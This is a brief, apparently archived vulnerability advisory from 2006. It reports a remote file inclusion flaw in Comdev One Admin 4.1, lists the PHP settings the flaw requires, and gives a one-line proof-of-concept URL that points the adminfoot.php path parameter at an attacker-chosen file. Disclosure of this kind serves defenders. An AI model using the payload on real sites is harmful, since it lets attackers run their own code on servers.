Home / exploitsPDF  

ComdevOneAdmin4.1.txt

Posted on 21 October 2006

/****************************************/ http://www.w4cking.com CREDIT: w4ck1ng.com PRODUCT: Comdev One Admin 4.1 http://www.comdevweb.com/oneadmin.php VULNERABILITY: Remote File Inclusion NOTES: - requires register globals on - requires magic quotes off POC: <host>/<path>/oneadmin/adminfoot.php?path[docroot]=<local/remote file> ADVISORY & EXPLOIT (requires registration): http://w4ck1ng.com/board/showthread.php?t=1491 /****************************************/

 

TOP